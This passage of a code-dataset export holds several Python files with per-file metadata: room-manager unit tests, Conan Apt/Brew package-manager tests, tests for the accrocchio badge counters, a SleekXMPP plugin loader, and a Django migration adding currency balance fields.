        value = self.manager.rename(BaseDatabaseTest.CHANNEL_ID, str(uuid()), BaseDatabaseTest.ROOM_NAME)
        self.assertIsNotNone(value)
        self.assertEqual(BaseDatabaseTest.ROOM_NAME, self.db.get_room_name(BaseDatabaseTest.ROOM_ID))

    def test_rename_room_blank_name(self):
        self._create_channel()
        self._create_room()
        self.assertEqual(BaseDatabaseTest.ROOM_NAME, self.db.get_room_name(BaseDatabaseTest.ROOM_ID))
        # BUGFIX: this previously passed ROOM_NAME, duplicating
        # test_rename_room_already_exists and never testing a blank name.
        value = self.manager.rename(BaseDatabaseTest.CHANNEL_ID, BaseDatabaseTest.ROOM_ID, '')
        self.assertIsNotNone(value)
        self.assertEqual(BaseDatabaseTest.ROOM_NAME, self.db.get_room_name(BaseDatabaseTest.ROOM_ID))

    def test_name_for_uuid(self):
        self._create_channel()
        self._create_room()
        self.assertEqual(BaseDatabaseTest.ROOM_NAME, self.manager.name_for_uuid(BaseDatabaseTest.ROOM_ID))

    def test_name_for_uuid_no_such_room(self):
        self._create_channel()
        self._create_room()
        value = self.manager.name_for_uuid(str(uuid()))
        self.assertIsNone(value)

    def test_get_owners_before_create(self):
        self._create_channel()
        # Before the room exists the manager returns an error string.
        value = self.manager.get_owners(BaseDatabaseTest.ROOM_ID)
        self.assertIsInstance(value, str)

    def test_get_owners(self):
        self._create_channel()
        self._create_room()
        owners = self.manager.get_owners(BaseDatabaseTest.ROOM_ID)
        self.assertIsInstance(owners, list)
        self.assertEqual(1, len(owners))
        self.assertEqual(BaseDatabaseTest.USER_ID, owners[0]['uuid'])
        self.assertEqual(BaseDatabaseTest.USER_NAME, owners[0]['name'])

    def test_get_moderators_before_create(self):
        self._create_channel()
        # Before the room exists the manager returns an error string.
        value = self.manager.get_moderators(BaseDatabaseTest.ROOM_ID)
        self.assertIsInstance(value, str)

    def test_get_moderators(self):
        self._create_channel()
        self._create_room()
        self.db.set_moderator(BaseDatabaseTest.ROOM_ID, BaseDatabaseTest.USER_ID)
        moderators = self.manager.get_moderators(BaseDatabaseTest.ROOM_ID)
        self.assertIsInstance(moderators, list)
        self.assertEqual(1, len(moderators))
        self.assertEqual(BaseDatabaseTest.USER_ID, moderators[0]['uuid'])
        self.assertEqual(BaseDatabaseTest.USER_NAME, moderators[0]['name'])
| 47.185185
| 118
| 0.730965
| 1,194
| 10,192
| 5.956449
| 0.115578
| 0.18279
| 0.148481
| 0.190242
| 0.806665
| 0.77306
| 0.765748
| 0.739173
| 0.725956
| 0.721457
| 0
| 0.001906
| 0.176315
| 10,192
| 215
| 119
| 47.404651
| 0.845265
| 0.052787
| 0
| 0.591716
| 0
| 0
| 0.008608
| 0.002385
| 0
| 0
| 0
| 0
| 0.337278
| 1
| 0.153846
| false
| 0
| 0.029586
| 0
| 0.195266
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
210f6434dc7e0b1127d19c62648caf3cbf4fa95c
| 6,405
|
py
|
Python
|
conans/test/functional/tools/system/package_manager_test.py
|
Mu-L/conan
|
7c24ec4bbd6e8c16cdcd879403aae742689bc36a
|
[
"MIT"
] | 1
|
2019-11-04T17:23:09.000Z
|
2019-11-04T17:23:09.000Z
|
conans/test/functional/tools/system/package_manager_test.py
|
Mu-L/conan
|
7c24ec4bbd6e8c16cdcd879403aae742689bc36a
|
[
"MIT"
] | 1
|
2020-11-05T16:16:49.000Z
|
2020-11-05T16:16:49.000Z
|
conans/test/functional/tools/system/package_manager_test.py
|
Mattlk13/conan
|
005fc53485557b0a570bb71670f2ca9c66082165
|
[
"MIT"
] | null | null | null |
import platform
import textwrap
import pytest
import six
from conans.test.utils.tools import TestClient
@pytest.mark.tool_apt_get
@pytest.mark.skipif(platform.system() != "Linux", reason="Requires apt")
def test_apt_check():
    """Apt.check must report missing packages without installing anything.

    The recipe cross-builds (build=armv8, host=x86), so dpkg-query is run
    against the host architecture (i386), as asserted below.
    """
    client = TestClient()
    client.save({"conanfile.py": textwrap.dedent("""
        from conan import ConanFile
        from conan.tools.system.package_manager import Apt
        class MyPkg(ConanFile):
            settings = "arch", "os"
            def system_requirements(self):
                apt = Apt(self)
                not_installed = apt.check(["non-existing1", "non-existing2"])
                print("missing:", not_installed)
        """)})
    client.run("create . test/1.0@ -s:b arch=armv8 -s:h arch=x86")
    assert "dpkg-query: no packages found matching non-existing1:i386" in client.out
    assert "dpkg-query: no packages found matching non-existing2:i386" in client.out
    assert "missing: ['non-existing1', 'non-existing2']" in client.out
@pytest.mark.tool_apt_get
@pytest.mark.skipif(platform.system() != "Linux", reason="Requires apt")
def test_apt_install_substitutes():
    """Apt.install_substitutes: fail if every alternative list fails, succeed once one works."""
    client = TestClient()
    # Template conanfile; {} is filled with the install_substitutes call under test.
    conanfile_py = textwrap.dedent("""
        from conan import ConanFile
        from conan.tools.system.package_manager import Apt
        class MyPkg(ConanFile):
            settings = "arch", "os"
            def system_requirements(self):
                # FIXME this is needed because the ci-functional apt-get update fails
                try:
                    self.run("sudo apt-get update")
                except Exception:
                    pass
                apt = Apt(self)
                {}
        """)
    # Case 1: both substitute lists contain only non-existing packages -> error.
    installs = 'apt.install_substitutes(["non-existing1", "non-existing2"], ["non-existing3", "non-existing4"])'
    client.save({"conanfile.py": conanfile_py.format(installs)})
    client.run("create . test/1.0@ -c tools.system.package_manager:mode=install "
               "-c tools.system.package_manager:sudo=True", assert_error=True)
    assert "dpkg-query: no packages found matching non-existing1:amd64" in client.out
    assert "dpkg-query: no packages found matching non-existing2:amd64" in client.out
    assert "dpkg-query: no packages found matching non-existing3:amd64" in client.out
    assert "dpkg-query: no packages found matching non-existing4:amd64" in client.out
    assert "ERROR: while executing system_requirements(): " \
           "None of the installs for the package substitutes succeeded." in client.out
    # Case 2: the second list ("nano") is installable -> the create succeeds.
    # nano is removed first so apt actually reports a new install.
    client.run_command("sudo apt remove nano -yy")
    installs = 'apt.install_substitutes(["non-existing1", "non-existing2"], ["nano"], ["non-existing3"])'
    client.save({"conanfile.py": conanfile_py.format(installs)})
    client.run("create . test/1.0@ -c tools.system.package_manager:mode=install "
               "-c tools.system.package_manager:sudo=True")
    assert "1 newly installed" in client.out
@pytest.mark.tool_apt_get
@pytest.mark.skipif(platform.system() != "Linux", reason="Requires apt")
def test_build_require():
    """System requirements of a tool_require are checked against the build context.

    The consumer is created with build=armv8 / host=x86; the asserted
    dpkg-query output shows the tool_require queries arm64 (the build arch),
    not the host arch.
    """
    client = TestClient()
    client.save({"tool_require.py": textwrap.dedent("""
        from conan import ConanFile
        from conan.tools.system.package_manager import Apt
        class MyPkg(ConanFile):
            settings = "arch", "os"
            def system_requirements(self):
                apt = Apt(self)
                not_installed = apt.check(["non-existing1", "non-existing2"])
                print("missing:", not_installed)
        """)})
    client.run("export tool_require.py tool_require/1.0@")
    client.save({"consumer.py": textwrap.dedent("""
        from conan import ConanFile
        class consumer(ConanFile):
            settings = "arch", "os"
            tool_requires = "tool_require/1.0"
        """)})
    client.run("create consumer.py consumer/1.0@ -s:b arch=armv8 -s:h arch=x86 --build=missing")
    assert "dpkg-query: no packages found matching non-existing1:arm64" in client.out
    assert "dpkg-query: no packages found matching non-existing2:arm64" in client.out
    assert "missing: ['non-existing1', 'non-existing2']" in client.out
@pytest.mark.tool_brew
@pytest.mark.skipif(platform.system() != "Darwin", reason="Requires brew")
def test_brew_check():
    """Brew.check reports missing formulae without attempting installation."""
    client = TestClient()
    client.save({"conanfile.py": textwrap.dedent("""
        from conan import ConanFile
        from conan.tools.system.package_manager import Brew
        class MyPkg(ConanFile):
            settings = "arch"
            def system_requirements(self):
                brew = Brew(self)
                not_installed = brew.check(["non-existing1", "non-existing2"])
                print("missing:", not_installed)
        """)})
    client.run("create . test/1.0@")
    assert "missing: ['non-existing1', 'non-existing2']" in client.out
@pytest.mark.tool_brew
@pytest.mark.skipif(platform.system() != "Darwin", reason="Requires brew")
@pytest.mark.skip(reason="brew update takes a lot of time")
def test_brew_install_check_mode():
    """In the default 'check' mode, Brew.install must error out instead of installing."""
    client = TestClient()
    client.save({"conanfile.py": textwrap.dedent("""
        from conan import ConanFile
        from conan.tools.system.package_manager import Brew
        class MyPkg(ConanFile):
            settings = "arch"
            def system_requirements(self):
                brew = Brew(self)
                brew.install(["non-existing1", "non-existing2"])
        """)})
    client.run("create . test/1.0@", assert_error=True)
    assert "System requirements: 'non-existing1, non-existing2' are missing but " \
           "can't install because tools.system.package_manager:mode is 'check'" in client.out
@pytest.mark.tool_brew
@pytest.mark.skipif(platform.system() != "Darwin", reason="Requires brew")
@pytest.mark.skip(reason="brew update takes a lot of time")
def test_brew_install_install_mode():
    """With mode=install, Brew actually invokes brew, which fails on unknown formulae."""
    client = TestClient()
    client.save({"conanfile.py": textwrap.dedent("""
        from conan import ConanFile
        from conan.tools.system.package_manager import Brew
        class MyPkg(ConanFile):
            settings = "arch"
            def system_requirements(self):
                brew = Brew(self)
                brew.install(["non-existing1", "non-existing2"])
        """)})
    client.run("create . test/1.0@ -c tools.system.package_manager:mode=install", assert_error=True)
    assert "Error: No formulae found in taps." in client.out
| 42.986577
| 112
| 0.646682
| 786
| 6,405
| 5.187023
| 0.150127
| 0.029433
| 0.040471
| 0.073584
| 0.801815
| 0.77557
| 0.77557
| 0.764287
| 0.738288
| 0.701496
| 0
| 0.015289
| 0.223888
| 6,405
| 148
| 113
| 43.277027
| 0.804868
| 0
| 0
| 0.625954
| 0
| 0.030534
| 0.65808
| 0.130835
| 0
| 0
| 0
| 0
| 0.137405
| 1
| 0.045802
| false
| 0.007634
| 0.137405
| 0
| 0.183206
| 0.022901
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
216712f95db80fe7f0b1c8d753a48c126b081a9d
| 7,581
|
py
|
Python
|
test/accrocchio/test_badgeofshame.py
|
fcracker79/accrocchio
|
5c74278c47d813e53fb53e6a27db6bfcb5561f51
|
[
"MIT"
] | 12
|
2017-09-20T22:59:05.000Z
|
2022-03-09T10:02:19.000Z
|
test/accrocchio/test_badgeofshame.py
|
fcracker79/accrocchio
|
5c74278c47d813e53fb53e6a27db6bfcb5561f51
|
[
"MIT"
] | 1
|
2018-03-20T13:46:38.000Z
|
2018-03-20T21:08:53.000Z
|
test/accrocchio/test_badgeofshame.py
|
fcracker79/accrocchio
|
5c74278c47d813e53fb53e6a27db6bfcb5561f51
|
[
"MIT"
] | null | null | null |
import unittest
from unittest import mock
# noinspection PyUnresolvedReferences
from accrocchio.badgeofshame import accrocchio, detonator, epoxy, compromise, blinder, flypaper
from accrocchio.badgeofshame import this_is_a, this_is_an
from accrocchio.observers import AccrocchioObserver
class TestBadgeOfShame(unittest.TestCase):
    """Tests for the accrocchio badge-of-shame hit counters.

    Covers function decorators, metaclasses, class decorators, one-shot
    markers (this_is_a / this_is_an), context managers, typing annotations,
    and observer notification.  The repeated counter checks are factored
    into the two private helpers below.
    """

    def setUp(self):
        # Every test starts from a clean global accrocchio counter.
        accrocchio.reset()
        assert accrocchio.how_many() == 0

    def _assert_hits(self, n_accrocchio, n_detonator, n_epoxy):
        """Assert the accrocchio/detonator/epoxy counters in one call."""
        self.assertEqual(n_accrocchio, accrocchio.how_many())
        self.assertEqual(n_detonator, detonator.how_many())
        self.assertEqual(n_epoxy, epoxy.how_many())

    def _assert_class_hits(self, n_accrocchio, n_compromise, n_blinder, n_epoxy):
        """Assert the accrocchio/compromise/blinder/epoxy counters in one call."""
        self.assertEqual(n_accrocchio, accrocchio.how_many())
        self.assertEqual(n_compromise, compromise.how_many())
        self.assertEqual(n_blinder, blinder.how_many())
        self.assertEqual(n_epoxy, epoxy.how_many())

    def test(self):
        # noinspection PyUnusedLocal
        @accrocchio
        def accrocchio_fun(a, b):
            pass
        # noinspection PyUnusedLocal
        @detonator
        def detonator_fun(a, b):
            pass
        # noinspection PyUnusedLocal
        @epoxy
        def epoxy_fun(a, b):
            pass
        # Decorating a function alone does not count a hit; calling it does.
        self.assertEqual(0, accrocchio.how_many())
        [accrocchio_fun(1, 2) for _ in range(3)]
        self.assertEqual(3, accrocchio.how_many())
        accrocchio.reset()
        self.assertEqual(0, accrocchio.how_many())
        [accrocchio_fun(1, 2) for _ in range(3)]
        accrocchio.reset()
        self._assert_hits(0, 0, 0)
        [detonator_fun(1, 2) for _ in range(3)]
        [epoxy_fun(1, 2) for _ in range(4)]
        # Specialised badges also count towards the generic accrocchio total.
        self._assert_hits(7, 3, 4)
        accrocchio.reset()
        # We expect resetting accrocchio to reset detonators (et al.) as well.
        self._assert_hits(0, 0, 0)
        [detonator_fun(1, 2) for _ in range(3)]
        [epoxy_fun(1, 2) for _ in range(4)]
        epoxy.reset()
        # Resetting one specialised badge leaves the other counters untouched.
        self._assert_hits(7, 3, 0)

    def test_observers(self):
        # noinspection PyUnusedLocal
        @accrocchio
        def accrocchio_fun(a, b):
            pass
        # noinspection PyUnusedLocal
        @detonator
        def detonator_fun(a, b):
            pass
        # noinspection PyUnusedLocal
        @flypaper
        def flypaper_fun(a, b):
            pass
        # NOTE(review): flypaper_fun is defined but never called; presumably
        # kept to show decoration alone does not notify — confirm.
        accrocchio_observer = mock.create_autospec(AccrocchioObserver)
        accrocchio.add_observer(accrocchio_observer)
        detonator_observer = mock.create_autospec(AccrocchioObserver)
        detonator.add_observer(detonator_observer)
        accrocchio_fun(1, 2)
        # A generic hit notifies only the accrocchio observer.
        self.assertEqual(0, accrocchio_observer.reset.call_count)
        self.assertEqual(0, detonator_observer.on_accrocchio.call_count)
        self.assertEqual(1, accrocchio_observer.on_accrocchio.call_count)
        detonator_fun(1, 2)
        # A detonator hit notifies both its own and the generic observer.
        self.assertEqual(1, detonator_observer.on_accrocchio.call_count)
        self.assertEqual(0, accrocchio_observer.reset.call_count)
        self.assertEqual(2, accrocchio_observer.on_accrocchio.call_count)
        accrocchio_fun(1, 2)
        self.assertEqual(0, accrocchio_observer.reset.call_count)
        self.assertEqual(3, accrocchio_observer.on_accrocchio.call_count)
        accrocchio.reset()
        # Resetting accrocchio propagates the reset to specialised observers.
        self.assertEqual(1, accrocchio_observer.reset.call_count)
        self.assertEqual(1, detonator_observer.reset.call_count)
        detonator.reset()
        # Resetting detonator does NOT propagate upwards to accrocchio.
        self.assertEqual(1, accrocchio_observer.reset.call_count)
        self.assertEqual(2, detonator_observer.reset.call_count)

    # noinspection PyUnusedLocal
    def test_metaclass(self):
        class AccrocchioClass(metaclass=accrocchio):
            pass
        class CompromiseClass(metaclass=compromise):
            pass
        class BlinderClass(metaclass=blinder):
            pass
        # Defining the three classes counts one hit each.
        self._assert_class_hits(3, 1, 1, 0)
        AccrocchioClass()
        self._assert_class_hits(4, 1, 1, 0)
        CompromiseClass()
        self._assert_class_hits(5, 2, 1, 0)

    # noinspection PyUnusedLocal
    def test_class_decorator(self):
        @accrocchio
        class AccrocchioClass:
            pass
        @compromise
        class CompromiseClass:
            def a_method(self):
                pass
        @blinder
        class BlinderClass:
            pass
        # Decorating the three classes counts one hit each.
        self._assert_class_hits(3, 1, 1, 0)
        AccrocchioClass()
        self._assert_class_hits(4, 1, 1, 0)
        c = CompromiseClass()
        self._assert_class_hits(5, 2, 1, 0)
        c.a_method()
        # Calling an ordinary method does not count a new hit.
        self._assert_class_hits(5, 2, 1, 0)
        CompromiseClass()
        self._assert_class_hits(6, 3, 1, 0)

    def test_one_shot_accrocchi(self):
        self.assertEqual(0, accrocchio.how_many())
        [this_is_an(accrocchio) for _ in range(3)]
        self.assertEqual(3, accrocchio.how_many())
        accrocchio.reset()
        self.assertEqual(0, accrocchio.how_many())
        [this_is_an(accrocchio) for _ in range(3)]
        accrocchio.reset()
        self._assert_hits(0, 0, 0)
        [this_is_a(detonator) for _ in range(3)]
        [this_is_an(epoxy) for _ in range(4)]
        self._assert_hits(7, 3, 4)
        accrocchio.reset()
        # We expect resetting accrocchio to reset detonators (et al.) as well.
        self._assert_hits(0, 0, 0)
        [this_is_a(detonator) for _ in range(3)]
        [this_is_an(epoxy) for _ in range(4)]
        epoxy.reset()
        self._assert_hits(7, 3, 0)

    def test_context(self):
        # Entering a badge context counts one hit per `with`, nesting included.
        with accrocchio:
            pass
        with detonator:
            with detonator:
                pass
        self.assertEqual(3, accrocchio.how_many())
        self.assertEqual(2, detonator.how_many())

    def test_typing(self):
        # Using a badge as a typing annotation counts one hit at definition
        # time; calling the annotated function adds nothing.
        def f(a: detonator[int]):
            pass
        self.assertEqual(1, accrocchio.how_many())
        self.assertEqual(1, detonator.how_many())
        f(1)
        self.assertEqual(1, accrocchio.how_many())
        self.assertEqual(1, detonator.how_many())
| 35.759434
| 104
| 0.64411
| 870
| 7,581
| 5.428736
| 0.088506
| 0.254076
| 0.09549
| 0.19098
| 0.794199
| 0.757358
| 0.741901
| 0.723269
| 0.703578
| 0.692568
| 0
| 0.01967
| 0.248912
| 7,581
| 211
| 105
| 35.92891
| 0.8098
| 0.046828
| 0
| 0.716763
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.468208
| 1
| 0.092486
| false
| 0.086705
| 0.028902
| 0
| 0.16185
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
dcdc575801134824c6c41b2e57a0596b069ebd61
| 175
|
py
|
Python
|
move_bot/components/__init__.py
|
rerobins/rho_move_bot
|
8e431d6a68f51db2703326d30ed3110eec824c39
|
[
"BSD-3-Clause"
] | null | null | null |
move_bot/components/__init__.py
|
rerobins/rho_move_bot
|
8e431d6a68f51db2703326d30ed3110eec824c39
|
[
"BSD-3-Clause"
] | null | null | null |
move_bot/components/__init__.py
|
rerobins/rho_move_bot
|
8e431d6a68f51db2703326d30ed3110eec824c39
|
[
"BSD-3-Clause"
] | null | null | null |
from move_bot.components.update_service import update_service
from sleekxmpp.plugins.base import register_plugin
def load_components():
    """Register this package's SleekXMPP plugins (currently only update_service)."""
    register_plugin(update_service)
| 21.875
| 61
| 0.845714
| 23
| 175
| 6.130435
| 0.608696
| 0.276596
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102857
| 175
| 7
| 62
| 25
| 0.898089
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
dce706ac748aa4855ecc21a8e8010bfe3dd2ac39
| 1,526
|
py
|
Python
|
cointrol/core/migrations/0004_auto_20171103_2342.py
|
fakegit/cointrol
|
077bb66189ff2d3f7714ad2a7812d4860c825cba
|
[
"MIT"
] | 967
|
2015-03-19T17:28:07.000Z
|
2022-03-24T22:55:47.000Z
|
cointrol/core/migrations/0004_auto_20171103_2342.py
|
fakegit/cointrol
|
077bb66189ff2d3f7714ad2a7812d4860c825cba
|
[
"MIT"
] | 23
|
2017-03-11T23:08:13.000Z
|
2020-04-18T14:04:24.000Z
|
cointrol/core/migrations/0004_auto_20171103_2342.py
|
fakegit/cointrol
|
077bb66189ff2d3f7714ad2a7812d4860c825cba
|
[
"MIT"
] | 287
|
2017-03-15T05:15:56.000Z
|
2022-01-29T08:04:16.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-11-03 22:42
from __future__ import unicode_literals
import cointrol.core.fields
from django.db import migrations
class Migration(migrations.Migration):
    """Add available/balance/reserved amount columns for EUR and XRP."""

    dependencies = [
        ('core', '0003_ticker_open'),
    ]

    # Equivalent to the generated list of six AddField operations: one
    # AmountField per (currency, bucket) pair, in the original order
    # (eur_* first, then xrp_*; available/balance/reserved within each).
    operations = [
        migrations.AddField(
            model_name='balance',
            name='{}_{}'.format(currency, bucket),
            field=cointrol.core.fields.AmountField(
                decimal_places=8, default=0, max_digits=30),
        )
        for currency in ('eur', 'xrp')
        for bucket in ('available', 'balance', 'reserved')
    ]
| 32.468085
| 95
| 0.608126
| 165
| 1,526
| 5.436364
| 0.290909
| 0.093645
| 0.140468
| 0.180602
| 0.77592
| 0.77592
| 0.77592
| 0.730212
| 0.730212
| 0.730212
| 0
| 0.040614
| 0.273919
| 1,526
| 46
| 96
| 33.173913
| 0.768953
| 0.044561
| 0
| 0.615385
| 1
| 0
| 0.092096
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.076923
| 0
| 0.153846
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.